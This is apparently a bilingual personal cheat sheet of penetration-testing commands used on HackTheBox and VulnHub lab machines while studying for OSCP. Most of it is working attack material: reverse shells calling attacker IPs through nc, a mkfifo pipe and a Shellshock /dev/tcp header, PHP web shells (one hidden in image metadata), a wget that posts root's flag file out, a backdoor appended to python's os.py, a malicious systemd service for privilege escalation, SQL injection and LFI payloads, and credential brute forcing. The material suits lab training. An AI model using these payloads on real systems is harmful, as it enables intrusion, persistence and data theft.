# PWN skills ## buffer overflow Ref.https://tech-blog.cymetrics.io/posts/crystal/reverse-01/ Ref.https://tryhackme.com/room/bufferoverflowprep ## base64 decode >cat myplace.backup | base64 --decode > myplace-decoded.backup ## convert hexadecimal to text http://www.unit-conversion.info/texttools/hexadecimal/ ## cron list >crontab -l; ls -alh /var/spoolcron ; ls -al /etc/ |grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /var/spool/cron/crontabs/root ## curl $ curl -X OPTIONS -v http:<IP> $ curl -v -X PUT -d '<?php echo system($_REQUEST['cmd']);?>' http://172.20.10.4/test/hi.php Ref.[SICKOS: 1.2](https://hackmd.io/ewCvyV8PSJKaiFkYr5a_8g) ## dirb $dirb http://10.10.10.48 -r -o map.init $dirb http://192.168.2.196 ## dns > $ dnsrecon -r 10.10.10.0/24 -n 10.10.10.13  $dig axfr @10.10.10.13 cronos.htb ## /etc/hosts & dig > `host -l cronos.htb 10.10.10.13`  > dig axfr @10.10.10.13 cronos.htb > 若網址進去是 apache2 首頁，可在 hosts 底下新增 domain，看看首頁是什麼 >  ## evil-winrm $evil-winrm -i 10.129.88.189 -u administrator -p badminton ## exiftool 將 code 丟進圖片檔 $exiftool -Comment='<?php system("nc 10.10.14.15 1234 -e /bin/bash"); ?>' 1.png ``` 接著將 1.png rename 成 1.php.png ┌──(root㉿kali)-[/home/kali/reverse_tool] └─# ls 1.png 1.png_original ┌──(root㉿kali)-[/home/kali/reverse_tool] └─# mv 1.png 1.php.png ``` ## finger user euum https://pentestmonkey.net/tools/user-enumeration/finger-user-enum `./finger-user-enum.pl -U /usr/share/wordlists/users.txt -t 10.0.0.1` ## ftp $ ftp 10.10.10.3 ``` Name (10.10.10.3:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||58017|). 150 Here comes the directory listing. 226 Directory send OK. ``` ## gcc `gcc 44298.c -o test` `chmod +x test & ./test` ## gobuster `kali 內建沒有此套件，先用 apt 裝一裝` `若要找 sub domain 可以從 https://gitlab.com/kalilinux/packages/seclists/blob/f8146198d2359eaaabd0bd18b4afa880965449e8/Discovery/DNS/subdomains-top1million-5000.txt` 先下載 $gobuster dir -u http://10.10.10.56 -w /usr/share/wordlists/dirb/common.txt -t 200 $gobuster dir -u http://10.10.10.56/cgi-bin/ -x .php,.html,.txt,.sh -w /usr/share/wordlists/dirb/common.txt -t 200 ``` 這個找子目錄比較詳細: $gobuster dir -u https://10.10.10.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 > gobuster_https.map -k $gobuster dir -k -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x php > admin_map ``` ### 找 txt 檔 $gobuster dir -u https://10.10.10.60 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x txt -t 200 ### gobuster subdomain $gobuster vhost -u cronos.htb -w /usr/share/wordlists/subdomains-top1million-5000.txt -t 50   若是 443 port，-k 可以略過 cert check Ref.[HTB Shocker](https://www.linkedin.com/pulse/hack-box-htb-shocker-walkthrough-abdulhakim-%C3%B6ner/) ## hashcat `hashcat -m 7400 sunday.hashes /usr/share/wordlists/rockyou.txt --force` ## hydra `$hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 -t 4 10.10.10.76 ssh` `$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 -V -f http-post-form '/department/login.php:username=^USER^&password=^PASS^:invalid password' -t 64` `$ hydra 10.10.10.43 -l whatever -P /usr/share/wordlists/rockyou.txt https-post-form "/db/:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -V -s 443 -t 64` ## IRC $ apt-get install hexchat ## john $john -w=/usr/share/wordlists/rockyou.txt hash.txt ## LFI `http://10.10.10.84/browse.php?file=../../../etc/passwd` `http://10.10.10.84/browse.php?file=../../../../../etc/passwd` ## md5 hash https://hashes.com/en/decrypt/hash ## mongoDB [blob:https://app.hackthebox.com/0e747bd5-7b42-4bae-a434-301be7c6cce3](https://) $curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz $tar xvf mongodb-linux-x86_64-3.4.7.tgz $cd mongodb-linux-x86_64-3.4.7/bin $./mongo mongodb://{target_IP}:27017 ``` > show dbs; admin 0.000GB config 0.000GB local 0.000GB sensitive_information 0.000GB users 0.000GB > use admin switched to db admin > show collections system.version > use sensitive_information switched to db sensitive_information > show collections flag > db.flag.find().pretty() { "_id" : ObjectId("630e3dbcb82540ebbd1748c5"), "flag" : "1b6e6fb359e7c40241b6d431427ba6ea" } > ``` ## mysql、MariaDB $mysql -h <IP> -u root $show databases; ``` $use htb; MariaDB [htb]> show tables; +---------------+ | Tables_in_htb | +---------------+ | config | | users | +---------------+ 2 rows in set (0.164 sec) MariaDB [htb]> ``` SELECT * FROM {table_name}` $SELECT * FROM config; ## nc ``` 攻擊(kali): $nc -lnvp 4444 被攻擊(靶機): $nc <KALIIP> 4444 -e /bin/sh ```` $nc -c bash 10.10.14.2 443 ## ncat (SMTP) $ncat 10.10.10.17 110 ``` USER orestis +OK PASS kHGuERB29DNiNE +OK Logged in. list +OK 2 messages: 1 977 2 514 retr 1 (讀第一封信) xxxx retr 2 (讀第二封信) ``` ## nmap **盡量用 root 去跑** `$nmap -sV -p- 10.129.88.189 --min-rate 10000` ← 找 allport `$sudo nmap -sS -A 10.129.88.189 -p- --max-rate=10000` `$nmap -Pn -sC -sV -oA tcp -p- -T4 -vvvvv --reason IP.AD.DR.SS.` `$nmap -sV -sC -A -Pn 10.10.10.3` `$nmap -sC -sV -T4 -v 10.10.10.3 -oN init.map` `$nmap -sC -sV -T4 -v 10.10.10.3 -Pn -oN init.map` `$nmap -sC -sV -o init.map 10.10.10.76` ``` $nmap -p- --min-rate 10000 10.10.10.76 port 出來後: $nmap 10.10.10.76 -p 22022,79,111,63550 -A > init.map ``` ## nikto nikto是一個用來發現、檢查網頁伺服器全問題的工具。對目標主機會使用大量請求 $ nikto -h http://<IP> Ref. [Kioptrix: Level 1](https://hackmd.io/PMATyoQlShqXcryHsQFiaw) ## responder with NTLM responder 配搭 LFI 使用，用於打 NTLM Ref.https://www.freebuf.com/articles/network/256844.html 先在 kail 上: $responder -I tun0 在網址做 LFI: http://unika.htb/index.php?page=//10.10.14.20/somefile 此時 responder 就會有回應:  ## reverse shell ``` <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f'); ?> ``` ## redis ``` $redis-cli -h 10.129.136.187 -p 6379 $10.129.136.187:6379>info ``` ``` 取得 all key $10.129.136.187:6379> KEYS * ``` ``` 10.129.136.187:6379> KEYS * 1) "temp" 2) "numb" 3) "flag" 4) "stor" 10.129.136.187:6379> GET flag "03e1d2b376c37ab3f5319922053953eb" 10.129.136.187:6379> ``` ## rsync ``` use rsync --list-only source to list all the files in that directory: $rsync --list-only 10.129.90.51:: public Anonymous Share $rsync --list-only 10.129.90.51::public drwxr-xr-x 4,096 2022/10/24 23:02:23 . -rw-r--r-- 33 2022/10/24 22:32:03 flag.txt $rsync 10.129.90.51::public/flag.txt hihi.txt ``` ## samba smbclient using `-N` for null session (or no auth) and `-L` to list: `$ smbclient -N -L 10.10.10.3` ``` 上傳用 put 下載用 get ``` `$ smbclient -N '\\10.10.10.3\tmp\'` ``` ┌──(root㉿kali)-[~/mywork/friendzone] └─# smbclient -N '\\10.10.10.123\print$\' tree connect failed: NT_STATUS_ACCESS_DENIED ┌──(root㉿kali)-[~/mywork/friendzone] └─# smbclient -N '\\10.10.10.123\general\' Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Jan 17 04:10:51 2019 .. D 0 Tue Sep 13 22:56:24 2022 creds.txt N 57 Wed Oct 10 07:52:42 2018 3545824 blocks of size 1024. 1650472 blocks available smb: \> get creds.txt getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \> ``` ``` $nmap --script smb-enum-shares.nse -p445 10.10.10.123 ``` ## searchsploit $searchsploit PACKAGE_NAME $searchsploit wp support plus (這是當時找 wp-support-plus 套件時，發現可以用空格隔開) $searchsploit -m NUMBER (下載)`  ## shellshock $ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.5/4488 0>&1' http://10.10.10.56:80/cgi-bin/user.sh 注意若跑出 zsh: no such file or directory: /dev/tcp/，切到 root 去試  Ref.[HTB Shocker](https://resources.infosecinstitute.com/topic/hack-the-box-htb-walkthrough-shocker/) ## ssh ``` user private key to login: $ssh -i id_rsa` ``` ## steghide ``` 圖片 $apt-get install steghide $steghide extract -sf irked.jpg ``` ## strings >$strings /dev/sdb  ## sql [MySQL SQL Injection Cheat Sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) [https://ivanitlearning.wordpress.com/2020/10/14/hackthebox-jarvis/](https://) ``` to enumerate the number of columns: ORDER BY n-- UNION SELECT 1,2,3,4,5,6,7-- ``` group_concat(user,password) http://jarvis.htb/room.php?cod=0 UNION SELECT 1,group_concat(user,password),@@version,@@hostname,user(),6,7 FROM mysql.user-- Ref:[https://mariadb.com/kb/en/group_concat/](https://mariadb.com/kb/en/group_concat/) ## sql injection 'OR 1=1 -- admin'# admin' '1'='1`  https://www.gushiciku.cn/pl/pXfm/zh-tw Ref. [Kioptrix: Level 1.1](https://hackmd.io/Lzfog-wgSDu1yO7130zGcg) ## sqlmap(OSCP 考試禁用) $ sqlmap -u "http://172.20.10.5/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --level=3 -risk=3 -D jabcd0cs -T odm_user -C id,username,password --dump --batch ## SUID Looking at SUID binaries, the `systemctl` program stands out since it's not normally SUID: $find / -perm /4000 2>/dev/null or $find / -perm -u=s -type f 2>/dev/null  ``` 自己寫一個 systemctl 可以跑的 service 去提權，檔名為:666.service 內容為:(大小寫一定要對) [Unit] Description=test [Service] ExecStart=/bin/nc -e /bin/bash 10.10.14.14 7788 [Install] WantedBy=multi-user.target 接著 $systemctl enable /home/pepper/666.service (一定要完整路徑) $systemctl start 666.service ```  ## password hash Free Password Hash Cracker:https://crackstation.net/ ## password cracker fcrackzip 要先安裝 (在 kali 用 apt-get install) >fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace-decoded.backup ## php `可以往 LFI 方向想` `<?php system($_GET['cmd']);?>` ## pop3 telnet 10.10.10.51 110 > USER james > PASS james list (顯示郵件) >list +OK 1 743 1 743 retr 1 (顯示郵件內容) ## proxytunnel $ proxytunnel -p <IP:3128> -d 127.0.0.1:22 -a 666 Ref. [SKYTOWER](https://hackmd.io/Ns7Dc1I9SwOxNFdvG3-_Jg) ## proxychains https://0xdf.gitlab.io/2018/09/08/htb-poison.html ``` cat /etc/proxychains [ProxyList] # add proxy here ... # meanwile # defaults set to "tor" socks4 127.0.0.1 9050 第一個 terminal: kali@kali: $ssh charix@10.10.10.84 -D 9050 另開一個 terminal: kali@kali: $proxychains4 vncviewer 127.0.0.1:5901 -passwd secret ``` ## pspy [Pspy - Monitor linux processes without root permissions](https://github.com/DominicBreuker/pspy) 下載後，chmod +x 後執行 `$./pspy32` ## python ``` But I noticed that it’s importing the os library. Usually python libraries are only writable by root, but I checked os.py and friend had permissions to write to it : friend@FriendZone:/usr/lib/python2.7$ ls -la | grep os -rwxr-xr-x 1 root root 4635 Apr 16 2018 os2emxpath.py -rwxr-xr-x 1 root root 4507 Oct 6 2018 os2emxpath.pyc -rw-rw-r-- 1 friend friend 476 Jul 12 14:39 os.py -rw-r--r-- 1 root root 1187 Jul 12 14:40 os.pyc ``` ``` So I just put those two lines at the bottom of os.py : ``` ``` import os os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 5566 >/tmp/f') ``` ## python http 記得在你需要的檔案層底下，再下指令，這樣網頁顯示的檔案就會是你該層檔案夾裡的檔案: `/var/www/html` or `你的家目錄` ``` ┌──(root㉿kali)-[/var/www/html] └─# python2.7 -m SimpleHTTPServer 5555 ┌──(root㉿kali)-[/home/kali] └─# curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.6:5555/ ``` ## wget ``` $sudo wget http://10.10.14.2:4444 --post-file=/root/root.txt $kail@kail:$nc -lvp 4444 ``` ## wordpress ### wpscan $wpscan --url https://brainfuck.htb --disable-tls-checks $wpscan --url http://tartarsauce.htb/webservices/wp > wpscan.map ``` wordpress 掃套件: $wpscan --url http://10.10.10.88:80/webservices/wp -e ap --plugins-detection aggressive -t 200 > wpscan_plugin.map ``` ## xfreerdp $xfreerdp /v:10.129.154.204 /cert:ignore /u:Administrator ## 拿到交互式 shell $python -c 'import pty; pty.spawn("/bin/bash");' $python3 -c 'import pty; pty.spawn("/bin/bash");' ``` https://gtfobins.github.io/gtfobins/tar/#sudo $sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh ``` ## 提權 $python -c "import crypt: print crypt.crypt('password','password')" $sudo useradd -m -G root,sudo -p papAq5PwY/QQM vulnhubroot ## 提權 - sudo $sudo -u username /bin/bash   $ sudo -l * 知道 perl 有 root 權限 $(/bin/bash) ## 尋找可寫入的檔案 `find / -writable -type f 2>/dev/null` `find / -perm -u=s -type f 2>/dev/null` ###### tags: `command` `OSCP`